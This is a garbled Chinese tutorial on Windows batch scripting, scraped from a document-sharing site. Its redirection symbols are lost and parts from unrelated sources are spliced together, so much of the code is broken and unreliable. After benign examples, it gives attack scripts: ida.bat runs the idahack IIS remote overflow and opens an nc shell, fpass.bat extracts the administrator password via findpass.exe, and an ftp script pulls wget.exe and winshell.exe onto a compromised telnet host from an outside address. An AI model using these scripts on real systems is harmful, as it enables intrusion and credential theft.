批管理目标速成教育资料.doc

《批管理目标速成教育资料.doc》由会员分享，可在线阅读，更多相关《批管理目标速成教育资料.doc（26页珍藏版）》请在得力文库 - 分享文档赚钱的网站上搜索。

1、这是一篇技术教程，我会用很简单的文字表达清楚自己的意思，你要你识字就能看懂，就能学到知识。写这篇教程的目的，是让每一个看过这些文字的朋友记住一句话：如果爱可以让事情变的更简单，那么就让它简单吧！看这篇教程的方法，就是慢！慢慢的，如同品一个女人、一杯茗茶，你会发现很多以前就在眼前的东西突然变的很遥远，而有些很遥远的东西却又突然回到了眼前。先概述一下批处理是个什么东东。批处理的定义，至今我也没能给出一个合适的-众多高手们也都没给出-反正我不知道-看了我也不一定信服-我是个菜鸟，当然就更不用说了；但我想总结出一个“比较合适的”，而且我也相信自己可以把它解释的很清楚，让更多的菜鸟都知道这是个什么东东，

2、你用这个东东可以干什么事情。或许你会因为这篇文章而“无条件爱上批处理”，那么我的目的就达到了-我就是要让你爱上它，我就这么拽，你能怎么着？真的，爱有时候就这么拽，就是这么没理由，就是这么不要脸！真的！按照我的理解，批处理的本质，是一堆 DOS 命令按一定顺序排列而形成的集合。OK,never claver and get to business（闲话少说言归正传） 。批处理，也称为批处理脚本，英文译为BATCH，批处理文件后缀 BAT 就取的前三个字母。它的构成没有固定格式，只要遵守以下这条就 ok 了：每一行可视为一个命令，每个命令里可以含多条子命令，从第一行开始执行，直到最后一行结束，它运

3、行的平台是 DOS。批处理有一个很鲜明的特点：使用方便、灵活，功能强大，自动化程度高。我不想让自己写的教程枯燥无味，因为牵缠到代码（批处理的内容算是代码吧？）的问题本来就是枯燥的，很少有人能面对满屏幕的代码而静下心来。所以我会用很多简单实用的例子让读这篇教程的朋友去体会批处理的那四射的魅力，感受它那古灵精怪的性格，不知不觉中爱上批处理（晕，怎么又是爱？到底批处理和爱有什么关系？答案：没有！） 。再说句“闲话”：要学好批处理，DOS 基础一定要牢！当然脑子灵活也是很重要的一方面。例一、先给出一个最 easy 的批处理脚本让大家和它混个脸熟，将下面的几行命令保存为 name.bat 然后执行（以后

4、文中只给出代码，保存和执行方式类似）：ping a.txtping a.txtping a.txtping a.txtping a.txtping a.txtping a.txtping a.txtexit是不是都能看的懂？是不是很 easy？但它的作用却是很实用的，执行这个批处理后，可以在你的当前盘建立一个名为 a.txt 的文件，它里面记录的信息可以帮助你迅速找到速度最快的 QQ 服务器，从而远离“从服务器中转”那一痛苦的过程。这里的意思，是把前面命令得到的东西放到后面所给的地方，的作用，和的相同，区别是把结果追加到前一行得出的结果的后面，具体的说是下一行，而前面一行命令得

5、出的结果将保留，这样可以使这个 a.txt 文件越来越大（想到如何搞破坏了？） 。By the way，这个批处理还可以和其他命令结合，搞成完全自动化判断服务器速度的东东，执行后直接显示速度最快的服务器 IP，是不是很爽？后面还将详细介绍。例二、再给出一个已经过时的例子（a.bat）：echo offif exist C:Progra1TencentAD*.gif del C:Progra1TencentAD*.gifa.bat为什么说这是个过时的例子呢？很简单，因为现在已经几乎没有人用带广告的 QQ 了（KAO，我的 QQ 还显示好友三围呢！） ，所以它几乎用不上了。但曾经它的作用是不可小窥

6、的：删除 QQ 的广告，让对话框干干净净。这里用的地址是 QQ 的默认安装地址，默认批处理文件名为 a.bat，你当然可以根据情况自行修改。在这个脚本中使用了 if 命令，使得它可以达到适时判断和删除广告图片的效果，你只需要不关闭命令执行后的 DOS 窗口，不按 CTRL+C 强行终止命令，它就一直监视是否有广告图片（QQ 也再不断查看自己的广告是否被删除） 。当然这个脚本占用你一点点内存，呵呵。例三，使用批处理脚本查是否中冰河。脚本内容如下：echo offnetstat -a -n a.txttype a.txt | find “7626“ Path=C:WINNTsystem32;C:W

7、INNT;C:WINNTsystem32WBEM PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 6 Stepping 5, GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=0605 ProgramFiles=C:Program Files PROMPT=$P$G SystemDrive=C: SystemRoot=C:WINNT TEMP=C:

8、WINNTTEMP TMP=C:WINNTTEMP USERPROFILE=C:Documents and SettingsDefault User windir=C:WINNT _ path: 表示可执行程序的搜索路径. 我的建议是你把你的程序 copy 到 %windir%system32. 这个目录里面. 一般就可以自动搜索到. 语法: copy mychenxu.exe %windir%system32. 使用点(.) 便于一目了然 对环境变量的引用使用(英文模式,半角)双引号 %windir% 变量 %windir% 二次变量引用. 我们常用的还有 %temp% 临时文件目录 %wi

9、ndir% 系统目录 %errorlevel% 退出代码 输出文件到临时文件目录里面.这样便于当前目录整洁. 对有空格的参数. 你应该学会使用双引号(“) 来表示比如对 porgram file 文件夹操作 C:dir p* C: 的目录 2000-09-02 11:47 2,164 PDOS.DEF 1999-01-03 00:47 Program Files 1 个文件 2,164 字节 1 个目录 1,505,997,824 可用字节 C:cd pro* C:Program Files C: C:cd “Program Files“ C:Program Files # 3. 内置的特殊符

10、号(实际使用中间注意避开) # 微软里面内置了下列字符不能够在创建的文件名中间使用 con nul aux / | | 注释,表示后面为注释 : 标号作用 | 管道操作 tokens=2,3* delims=, “ %i in (myfile.txt) do echo %i %j %k 按照字母顺序 ijklmnopq 依次取参数. eol=c - 指一个行注释字符的结尾(就一个) skip=n - 指在文件开始时忽略的行数。 delims=xxx - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。 # 4. 简单批处理文件概念 # echo This is test a.txt type

11、 a.txt echo This is test 11111 a.txt type a.txt echo This is test 22222 a.txt type a.txt 第二个 echo 是追加 第三个 echo 将清空 a.txt 重新创建 a.txt netstat -n | find “3389“ 这个将要列出所有连接 3389 的用户的 ip. _test.bat_ echo please care echo plese care 1111 echo plese care 2222 echo plese care 3333 echo please care echo plese

12、 care 1111 echo plese care 2222 echo plese care 3333 rem 不显示注释语句,本行显示 rem 不显示注释语句,本行不显示 if exist %windir%system32find.exe (echo Find find.exe !) else (echo ERROR: Not find find.exe) if exist %windir%system32fina.exe (echo Find fina.exe !) else (echo ERROR: Not find fina.exe) _ 下面我们以具体的一个 idahack 程序就

13、是 ida 远程溢出为例子.应该是很简单的. _ida.bat_ rem ver 1.0 if NOT exist %windir%system32idahack.exe echo “ERROR: dont find idahack.exe“ if NOT exist %windir%system32nc.exe echo “ERROR: dont find nc.exe“ if “%1“ =“ goto USAGE if NOT “%2“ =“ goto SP2 :start echo Now start . ping %1 echo chinese win2k:1 sp1:2 sp2:3

14、idahack.exe %1 80 1 99 %temp%_tmp echo “prog exit code %errorlevel% idahack.exe“ type %temp%_tmp find “good luck :)“ %temp%_tmp echo “prog exit code %errorlevel% find goog luck“ if NOT errorlevel 1 nc.exe %1 99 goto END :SP2 idahack.exe %1 80 %2 99 %temp%_tmp type %temp%_tmp find “good luck :)“ %tem

15、p%_tmp if NOT errorlevel 1 nc.exe %1 99 goto END :USAGE echo Example: ida.bat IP echo Example: ida.bat IP (2,3) :END _ida.bat_END_ 下面我们再来第二个文件.就是得到 administrator 的口令. 大多数人说得不到.其实是自己的没有输入正确的信息. _fpass.bat_ rem ver 1.0 if NOT exist %windir%system32findpass.exe echo “ERROR: dont find findpass.exe“ if N

16、OT exist %windir%system32pulist.exe echo “ERROR: dont find pulist.exe“ echo start. echo _ if “%1“=“ goto USAGE findpass.exe %1 %2 %3 %temp%_findpass.txt echo “prog exit code %errorlevel% findpass.exe“ type %temp%_findpass.txt echo _Here_pass ipconfig /all %temp%_findpass.txt goto END :USAGE pulist.e

17、xe %temp%_pass.txt findstr.exe /i “WINLOGON explorer internat“ %temp%_pass.txt echo “Example: fpass.bat %1 %2 %3 %4 !“ echo “Usage: findpass.exe DomainName UserName PID-of-WinLogon“ :END echo “ fpass.bat %COMPUTERNAME% %USERNAME% administrator “ echo “ fpass.bat end %errorlevel% !“ _fpass.bat_END_ 还有一个就是已经通过 telnet 登陆了一个远程主机.怎样上传文件(win) 依次在窗口输入下面的东西. 当然了也可以全部拷贝.Ctrl+V 过去. 然后就等待吧! echo open 210.64.x.4 3396w echo readw echo readw echo cd winntw echo binaryw echo pwd w echo get wget.exe w echo get winshell.exe w echo get any.exe w echo quit w ftp -s:w